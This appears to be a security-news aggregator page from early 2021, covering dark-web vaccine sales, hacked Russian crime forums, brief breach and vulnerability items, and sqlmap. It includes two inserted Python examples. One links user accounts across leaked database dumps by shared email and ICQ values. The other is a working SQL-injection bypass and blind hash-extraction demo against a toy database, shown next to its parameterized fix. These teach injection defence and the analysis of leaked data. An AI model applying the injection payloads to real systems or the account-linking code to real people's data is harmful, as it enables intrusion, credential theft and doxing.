Welcome to the 191st iteration of the Kaspersky Transatlantic Cable podcast. On this week’s episode, Dave and I talk about fines, privacy, doxing, and more. We start with a pair of stories about fines levied on social networking sites. The first pertains to TikTok and minors, the second an Illinois ruling against Facebook in a class-action suit. Staying on the social media train, we also discuss a recent move by Twitter to flag false information pertaining to COVID-19 vaccines. Then, David interviews our HR team about the future of work, the state of HR, and more. We close out the podcast talking about a hacktivist group’s doxing of Gab users. If you like the podcast, please consider subscribing and sharing with your friends. For more information on the stories we covered, see the links below:
Facebook will pay $650 million to settle class action suit centered on Illinois privacy law
TikTok set for massive $92m payout over privacy suit
COVID-19: Twitter expands ‘warning labels’ to target misleading vaccine posts
Passwords, private posts exposed in hack of Gab social network
In December of 2020, the US FDA authorized the Pfizer vaccine against COVID-19 for emergency use. Within 24 hours, one of the largest global vaccination campaigns in history kicked off, with countries around the world rushing to begin the end of the pandemic. Unfortunately, supply chains haven’t been able to keep up, and poorly designed vaccination programs have resulted in long delays. And, of course, each country has prioritized certain groups of individuals for vaccination. What’s a desperate dose-seeker to do? And what options are open to those looking to profit from the chaos? They turn to the black market.

Vaccines for sale underground

You can find just about anything in dark web marketplaces. Looking for a premium porn site account? You can find one for as little as 50 cents. An “ID pack” containing full name, SSN, DOB, and phone numbers goes for about $10. Not surprisingly, since the pandemic began, a new market has opened up: selling all things related to COVID. That includes protective gear and, of course, vaccines.

Dark web marketplace postings selling doses of the Moderna and Pfizer vaccines

Searching 15 marketplaces, Kaspersky experts found advertisements for three major COVID vaccines: Pfizer/BioNTech, AstraZeneca, and Moderna. They also found some advertisements for unverified vaccines. Prices per dose range from $250 to $1,200, averaging around $500. Further analysis showed that pricing increased significantly after Moderna and Pfizer published their efficacy results, as did the number of advertisements. Sellers primarily come from France, Germany, the UK, and the USA, and communications use encrypted messaging apps such as Wickr and Telegram. Sellers predominantly request payment in bitcoin, with rare exceptions accepting other cryptocurrencies. That makes the payments harder to track and protects the sellers’ anonymity. Many of the sellers Kaspersky researchers found had conducted 100 to 500 such transactions.

Advertisement for a full dose of the Moderna vaccine at $500, paid in bitcoin

Scammers or the real deal?

Of course, when you go digging for products being sold illegally, you always run the risk of wasting your money on a product that will never materialize, and vaccine doses on the dark web are no exception to the rule. However, just how many vaccine sellers are distributing real medicine is unclear. We did find positive reviews on some of the posts, suggesting that at least some users are receiving doses. Are those reviews real? Your guess is as good as ours.

Reviews for one seller distributing vaccine doses. No way of telling whether real customers wrote the reviews, of course

Medical institutions, pharmacies, and hospitals around the world often end the day with leftover vaccine doses. It’s not inconceivable that someone working at these facilities could pocket the extra doses and connect with dark web intermediaries to sell them. At the same time, a little bottle from a shady dealer on some anonymous forum in a dark corner of the Web can contain just about anything, from a harmless saline solution to something really dangerous.

A darknet ad for a vaporizer cartridge with coronavirus vaccine from the “makers of the ‘boner pill’”? Totally legit!

That said, it’s important to note that even if what’s being sold is the real deal, the dose may not be effective by the time it arrives. One of the current vaccination campaign’s major challenges is the medicine’s storage requirements. For example, vaccine doses from Pfizer and BioNTech must be kept at -70 degrees Celsius, much colder than your average freezer or ice pack. That means successfully transporting this vaccine requires a deep-freeze delivery chain. Once the vaccine thaws, it can survive for only five days. Pfizer has developed a box with dry ice packs and a GPS tracker to transport doses, but it’s hard to come by. The Moderna vaccine is slightly easier to transport, needing -20 degrees Celsius storage, and AstraZeneca’s can be stored at normal refrigerator temperatures. However, maintaining even that temperature throughout the delivery chain is far from simple, and buyers have no way of knowing whether the vaccine was stored appropriately, or when it was thawed.

Photos from a vaccine seller in a Telegram channel showing preparation for distribution of AstraZeneca vaccine

No rush for vaccination, just get the certificate

People unwilling to fork over several hundred dollars to purchase a vaccine dose may go for a far cheaper scheme: buying fake vaccination certificates. European countries are the primary source for these certificates, which help ease lockdown measures for certain individuals and facilitate international travel. A European vaccination record card costs about $20–$25.

Forged vaccination card for sale on a darknet forum

Other countries require people to present proof they have no COVID infection before they may carry out certain activities, such as going to work in an office or making a doctor’s appointment. Scammers have been taking advantage of that fact as well. For example, in Russia, dark web users can buy a forged certificate asserting they do not have COVID. The certificate doesn’t come cheap, costing somewhere between 3,500 and 5,000 rubles ($50–$70).

To buy or not to buy?

Of course, darknet shopping is risky business, and it’s clear from the past year that scammers have been all too eager to profit off the current crisis. That means no one can be at all confident they will actually receive anything after transferring bitcoins, let alone a real vaccine dose that was stored properly and is safe to take. The bottom line? Wait for your turn to receive a real vaccine the right way.
Over the past few weeks, three of the longest-running and most venerated Russian-language online forums serving thousands of experienced cybercriminals have been hacked. In two of the intrusions, the attackers made off with the forums’ user databases, including email and IP addresses and hashed passwords. Members of all three forums are worried the incidents could serve as a virtual Rosetta Stone for connecting the real-life identities of the same users across multiple crime forums.

References to the leaked Mazafaka crime forum database were posted online in the past 48 hours.

On Tuesday, someone dumped thousands of usernames, email addresses and obfuscated passwords on the dark web, apparently pilfered from Mazafaka (a.k.a. “Maza,” “MFclub”), an exclusive crime forum that has for more than a decade played host to some of the most experienced and infamous Russian cyberthieves. At the top of a 35-page PDF leaked online is a private encryption key allegedly used by Maza administrators.

The database also includes ICQ numbers for many users. ICQ, also known as “I seek you,” was an instant message platform trusted by countless early denizens of these older crime forums before its use fell out of fashion in favor of more private networks, such as Jabber and Telegram. This is notable because ICQ numbers tied to specific accounts often are a reliable data point that security researchers can use to connect multiple accounts to the same user across many forums and different nicknames over time.

Cyber intelligence firm Intel 471 assesses that the leaked Maza database is legitimate. “The file comprised more than 3,000 rows, containing usernames, partially obfuscated password hashes, email addresses and other contact details,” Intel 471 found, noting that Maza forum visitors are now redirected to a breach announcement page. “Initial analysis of the leaked data pointed to its probable authenticity, as at least a portion of the leaked user records correlated with our own data holdings.”

The attack on Maza comes just weeks after another major Russian crime forum got plundered. On Jan. 20, a longtime administrator of the Russian-language forum Verified disclosed that the community’s domain registrar had been hacked, and that the site’s domain was redirected to an Internet server the attackers controlled.

A note posted by a Verified forum administrator concerning the hack of its registrar in January.

“Our [bitcoin] wallet has been cracked. Luckily, we did not keep large amounts in it, but this is an unpleasant incident anyway. Once the circumstances became clear, the admin assumed that THEORETICALLY, all the forum’s accounts could have been compromised (the probability is low, but it is there). In our business, it’s better to play safe. So, we’ve decided to reset everyone’s codes. This is not a big deal. Simply write them down and use them from now on.”

A short time later, the administrator updated his post, saying: “We are getting messages that the forum’s databases were filched after all when the forum was hacked. Everyone’s account passwords were forcibly reset. Pass this information to people you know. The forum was hacked through the domain registrar. The registrar was hacked first, then domain name servers were changed, and traffic was sniffed.”

On Feb. 15, the administrator posted a message purportedly sent on behalf of the intruders, who claimed they hacked Verified’s domain registrar between Jan. 16 and 20. “It should be clear by now that the forum administration did not do an acceptable job with the security of this whole thing,” the attacker explained. “Most likely just out of laziness or incompetence, they gave up the whole thing. But the main surprise for us was that they saved all the user data, including cookies, referrers, ip addresses of the first registrations, login analytics, and everything else.”

Other sources indicate tens of thousands of private messages between Verified users were stolen, including information about bitcoin deposits and withdrawals and private Jabber contacts.

The compromise of Maza and Verified, and possibly a third major forum, has many community members concerned that their real-life identities could be exposed. Exploit, perhaps the next-largest and most popular Russian forum after Verified, also experienced an apparent compromise this week. According to Intel 471, on March 1, 2021, the administrator of the Exploit cybercrime forum claimed that a proxy server the forum used for protection from distributed denial-of-service (DDoS) attacks might have been compromised by an unknown party. The administrator stated that on Feb. 27, 2021, a monitoring system detected unauthorized secure shell access to the server and an attempt to dump network traffic.

Some forum lurkers have speculated that these recent compromises feel like the work of some government spy agency. “Only intelligence services or people who know where the servers are located can pull off things like that,” mused one mainstay of Exploit. “Three forums in one month is just weird. I don’t think those were regular hackers. Someone is purposefully ruining forums.”

Others are wondering aloud which forum will fall next, and bemoaning the loss of trust among users that could be bad for business. “Perhaps they work according to the following logic,” wrote one Exploit user. “There will be no forums, there will be no trust between everyone, less cooperation, more difficult to find partners – fewer attacks.”
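The story above explains why leaked ICQ numbers and email addresses matter: they are the pivots that let an analyst tie accounts on different forums to one person. The Python below is an added example, not code from KrebsOnSecurity or Intel 471, of that cross-dump account linking. The forum names, rows and field names are constructed for the example; placeholder ICQ values such as "0" are ignored, and shared usernames are deliberately not treated as a pivot because common handles collide across forums.

```python
"""Link accounts across leaked forum dumps on shared pivot fields.

Added example; the sample dumps below are constructed, not real leaked data.
Pivots used: normalized email address and ICQ number. Usernames are NOT
pivots (common handles collide across forums), and password hashes are not
pivots either (the leaks were partially obfuscated and salts differ).
"""
import re
from collections import defaultdict

# Constructed sample rows with hypothetical field names.
FORUM_A = [  # hypothetical dump of a forum called "maza"
    {"user": "darkwolf", "email": "DarkWolf@example.net", "icq": "123-456-789"},
    {"user": "smoke", "email": "", "icq": "987654321"},
    {"user": "zero", "email": "zero@example.org", "icq": "0"},
]
FORUM_B = [  # hypothetical dump of a forum called "verified"
    {"user": "wolf_d", "email": "darkwolf@example.net", "icq": ""},
    {"user": "ghost", "email": "ghost@example.com", "icq": "123456789"},
    {"user": "zero", "email": "other@example.org", "icq": "0"},
]


def pivot_keys(row):
    """Return the normalized pivot keys one dump row contributes."""
    keys = []
    email = row.get("email", "").strip().lower()
    if "@" in email:
        keys.append("email:" + email)
    icq = re.sub(r"\D", "", row.get("icq", ""))  # keep digits only
    # Real ICQ UINs are 5+ digits; "0", "" or "-" are placeholders, not pivots.
    if len(icq) >= 5 and icq.strip("0"):
        keys.append("icq:" + icq)
    return keys


class DisjointSet:
    """Union-find over account identifiers of the form forum:username."""

    def __init__(self):
        self.parent = {}

    def find(self, x):
        self.parent.setdefault(x, x)
        while self.parent[x] != x:
            self.parent[x] = self.parent[self.parent[x]]  # path halving
            x = self.parent[x]
        return x

    def union(self, a, b):
        ra, rb = self.find(a), self.find(b)
        if ra != rb:
            self.parent[ra] = rb


def link_accounts(dumps):
    """dumps: {forum_name: [rows]} -> clusters that span more than one forum.

    Each cluster is {"accounts": [...], "pivots": [...]}; the pivots are the
    shared keys that produced the link, i.e. the evidence an analyst reports.
    """
    ds = DisjointSet()
    by_key = defaultdict(list)
    for forum, rows in dumps.items():
        for row in rows:
            acct = f"{forum}:{row['user']}"
            ds.find(acct)  # register accounts that have no usable pivot too
            for key in pivot_keys(row):
                by_key[key].append(acct)
    for accts in by_key.values():  # same pivot value => same person
        for other in accts[1:]:
            ds.union(accts[0], other)

    members = defaultdict(set)
    for acct in list(ds.parent):
        members[ds.find(acct)].add(acct)
    evidence = defaultdict(set)
    for key, accts in by_key.items():
        if len(accts) > 1:
            evidence[ds.find(accts[0])].add(key)

    clusters = []
    for root, accts in members.items():
        forums = {a.split(":", 1)[0] for a in accts}
        if len(forums) > 1:  # a single-forum cluster adds nothing cross-forum
            clusters.append({"accounts": sorted(accts), "pivots": sorted(evidence[root])})
    return sorted(clusters, key=lambda c: c["accounts"])


if __name__ == "__main__":
    for c in link_accounts({"maza": FORUM_A, "verified": FORUM_B}):
        print(", ".join(c["accounts"]), "<-", ", ".join(c["pivots"]))
```

On the constructed data, "darkwolf" on the first forum links to "wolf_d" by email and to "ghost" by ICQ number, so all three fall into one cluster, while the two "zero" accounts stay separate: their only shared value is the placeholder ICQ "0". Real dumps need more normalization (Jabber IDs, mixed encodings, throwaway mail domains), but the union-find structure and the evidence list are the part that scales.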
“Our takeaway from this at CISA's space is that identity is everything now,” Jay Gazlay said, noting that the level of success the adversary achieved with tactics like password spraying was not normal.
Security researcher Alexander Popov has discovered and fixed five similar issues in the virtual socket (vsock) implementation of the Linux kernel, tracked together as CVE-2021-26708.
The Lazarus Group, a North Korean hacking operation also known as Hidden Cobra, is deploying TFlower ransomware, using its MATA malware framework, security firm Sygnia reports.
Flaws like these in boot loaders allow circumvention of UEFI Secure Boot, a verification mechanism for ensuring that code executed by a computer's UEFI firmware is trusted and not malicious.
The hacker group stole sensitive employee files, such as job applications and background check authorizations that included Social Security numbers, and posted them online to extort the hospital.
CISA on Wednesday ordered federal agencies to immediately investigate, patch, or disconnect their on-premises Microsoft Exchange systems after Microsoft disclosed flaws being exploited by Chinese hackers.
The WiFi Mouse mobile application has an unpatched bug that lets adversaries hijack the paired desktop computer, according to researcher Christopher Le Roux, who found the flaw.
Cybersecurity firm Qualys is likely the latest victim to have suffered a data breach after a zero-day vulnerability in its Accellion FTA server was exploited to steal hosted files.
The majority of organizations do not sufficiently test the effectiveness of stand-alone security controls, or how they perform together as a complete security stack, against known attack techniques.
Government imposter scams now come with a new twist that has the potential to make them even more effective, as the Inspector General for the Social Security Administration (SSA) warns.
Eighty-eight percent of companies reported that before the pandemic they felt some level of confidence in their ability to fully and securely support remote work, according to a report by Tanium.
US managed service provider CompuCom has suffered a cyberattack leading to service outages and customers disconnecting from the MSP's network to prevent the spread of malware.
Identities have become the primary attack surface in the cloud. However, they remain largely unprotected because traditional security tools were designed to protect the network perimeter.
The Russian-speaking RTM threat group is targeting organizations in an ongoing campaign that leverages a well-known banking trojan, a brand-new ransomware strain, and extortion tactics.
Individuals on multiple dark-web hacking forums are sharing their knowledge of making fraudulent purchases on shops that implement 3-D Secure (3DS) to protect customer transactions.
PrismHR is suffering a massive outage after a cyberattack this weekend that, judging from conversations with customers, looks like a ransomware attack, BleepingComputer reported.
It can be unarguably stated that North Korea and cybercrime go hand in hand. The nation is highly focused on reinforcing its cyber capabilities, by all means necessary, and creating more than just a nuisance.
A user on a popular hacking forum was purportedly selling stolen credentials from six South American countries for the Swiss-based Adecco Group, the second-largest staffing provider in the world.
The healthcare industry remains most at risk, particularly through web gateways, and phishing is still a high-risk vector in this sector, according to cybersecurity experts.
The community has been connected to carding -- the trafficking of stolen financial data and payment card info -- and the discussion of topics like malware, exploits, spam, money laundering, and more.
In a new report by email cybersecurity company Agari, BEC scammers have started to target investors with fake 'capital call' notices that carry a much larger payout than your standard BEC scam.
With the release of View Planner 4.6 Security Patch 1 on March 2, VMware fixed CVE-2021-21978, an issue that could allow an attacker to execute code remotely. The bug has a CVSS score of 8.6.
With Auth0, Okta gets a cloud identity company that helps developers embed identity management into applications, adding an entirely new dimension to its identity platform.
sqlmap is an open source command-line automatic SQL injection tool. Its goal is to detect and take advantage of SQL injection vulnerabilities in web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options: perform an extensive back-end database management system fingerprint; retrieve the DBMS session user and current database; enumerate users, password hashes, privileges and databases; dump entire tables or user-specified tables and columns; run arbitrary SQL statements; read or write text or binary files on the file system; execute arbitrary commands on the operating system; establish an out-of-band stateful connection between the attacker box and the database server via a Metasploit payload stager, database stored procedure buffer overflow exploitation or an SMB relay attack; and more.
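sqlmap automates the detection and exploitation described above against HTTP parameters. The Python below is an added example, not sqlmap's code or output, that shows the underlying injection on a small in-memory SQLite database: a login query built by string concatenation beside its parameterized fix, the `' -- ` authentication bypass, and a boolean-based blind extraction that recovers a column one character at a time by binary search, which is the technique sqlmap's blind mode automates over HTTP. The table, users and password values are constructed for the example.

```python
"""SQL injection: vulnerable query, parameterized fix, and boolean-based
blind extraction against an in-memory SQLite database.

Added example with constructed data; not sqlmap's code. sqlmap performs the
same boolean inference over HTTP parameters, one request per comparison;
here the "request" is a direct call to the vulnerable login function.
"""
import hashlib
import sqlite3

ALICE_HASH = hashlib.sha256(b"correct horse").hexdigest()  # constructed sample
BOB_HASH = hashlib.sha256(b"hunter2").hexdigest()


def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, pwhash TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (username, pwhash, role) VALUES (?, ?, ?)",
        [("alice", ALICE_HASH, "admin"), ("bob", BOB_HASH, "user")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """Deliberately vulnerable: the username is concatenated into the SQL text."""
    pwhash = hashlib.sha256(password.encode()).hexdigest()
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND pwhash = '{pwhash}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Fix: bound parameters keep user input out of the SQL grammar."""
    pwhash = hashlib.sha256(password.encode()).hexdigest()
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND pwhash = ?",
        (username, pwhash),
    ).fetchone()
    return row[0] if row else None


def _oracle(conn, user, condition):
    """True iff the injected SQL condition holds for `user`'s row.

    The trailing '-- ' comments out the rest of the original query, so the
    login succeeds or fails depending only on `condition`: a one-bit oracle.
    """
    payload = f"{user}' AND ({condition}) -- "
    return login_vulnerable(conn, payload, "irrelevant") is not None


def blind_length(conn, column, user, max_len=256):
    """Binary-search the length of `column` using only yes/no answers."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if _oracle(conn, user, f"length({column}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def blind_extract(conn, column, user, length):
    """Recover `length` characters of `column`, about 7 oracle calls per character."""
    out = ""
    for pos in range(1, length + 1):  # SQL substr() is 1-indexed
        lo, hi = 32, 126  # printable ASCII range
        while lo < hi:
            mid = (lo + hi) // 2
            if _oracle(conn, user, f"unicode(substr({column}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = setup_db()
    print("bypass:", login_vulnerable(db, "alice' -- ", "wrong"))  # alice
    print("fixed: ", login_safe(db, "alice' -- ", "wrong"))        # None
    n = blind_length(db, "pwhash", "alice")
    print("leaked hash matches:", blind_extract(db, "pwhash", "alice", n) == ALICE_HASH)
```

Two things worth noticing: the password is hashed before it reaches the query, so only the username is injectable, which is exactly the kind of single injectable parameter sqlmap hunts for; and the blind routine never sees query output, only whether the login succeeded, which is why boolean-based extraction works against applications that show no error text and why it costs roughly seven requests per recovered character.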
Red Hat Security Advisory 2021-0733-01 - IBM Java SE version 7 Release 1 includes the IBM Java Runtime Environment and the IBM Java Software Development Kit. This update upgrades IBM Java SE 7 to version 7R1 SR4-FP80. Issues addressed include a buffer overflow vulnerability.
Red Hat Security Advisory 2021-0717-01 - IBM Java SE version 8 includes the IBM Java Runtime Environment and the IBM Java Software Development Kit. This update upgrades IBM Java SE 8 to version 8 SR6-FP25. Issues addressed include buffer overflow and bypass vulnerabilities.
Whitepaper titled Android Vulnerability in ES File Explorer. It provides an overview of manual exploitation of ES File Explorer version 4.1.9.7.4 using forged requests over HTTP.
Red Hat Security Advisory 2021-0719-01 - Red Hat Advanced Cluster Management for Kubernetes 2.0.8 images. Red Hat Advanced Cluster Management for Kubernetes provides the capabilities to address common challenges that administrators and site reliability engineers face as they work across a range of public and private cloud environments. Clusters and applications are all visible and managed from a single console, with security policy built in. This advisory contains the container images for Red Hat Advanced Cluster Management for Kubernetes, which resolve some security issues and bugs.
Red Hat Security Advisory 2021-0727-01 - The Berkeley Internet Name Domain is an implementation of the Domain Name System protocols. BIND includes a DNS server; a resolver library; and tools for verifying that the DNS server is operating correctly. Issues addressed include a buffer overflow vulnerability.
Enterprise cloud security firm Qualys has become the latest victim to join a long list of entities to have suffered a data breach after zero-day vulnerabilities in its Accellion File Transfer Appliance (FTA) server were exploited to steal sensitive business documents. As proof of access to the data, the cybercriminals behind the recent hacks targeting Accellion FTA servers have shared
Following Microsoft's release of out-of-band patches to address multiple zero-day flaws in on-premises versions of Microsoft Exchange Server, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an emergency directive warning of "active exploitation" of the vulnerabilities. The alert comes on the heels of Microsoft's disclosure that China-based hackers were
Signaling a major shift to its ads-driven business model, Google on Wednesday unequivocally stated it would not build alternate identifiers or tools to track users across multiple websites once it begins phasing out third-party tracking cookies from its Chrome browser by early 2022. "Instead, our web products will be powered by privacy-preserving APIs which prevent individual tracking while
Actor, presenter and writer Robert Llewellyn, famous for playing the part of Kryten in the science-fiction comedy “Red Dwarf,” joins us as we discuss robots gone rogue, electric vehicle nightmares, and creepy companions. All this and much much more can be found in the latest edition of the “Smashing Security” podcast, hosted by computer security …
Smashing Security podcast #217: Would you cuddle this revolting robot? – with Robert Llewellyn
Business Email Compromise (BEC) scammers, who have made rich returns in recent years tricking organisations into transferring funds into their accounts, have found a new tactic which attempts to swindle Wall Street firms out of significantly larger amounts of money. Read more in my article on the Tripwire State of Security blog.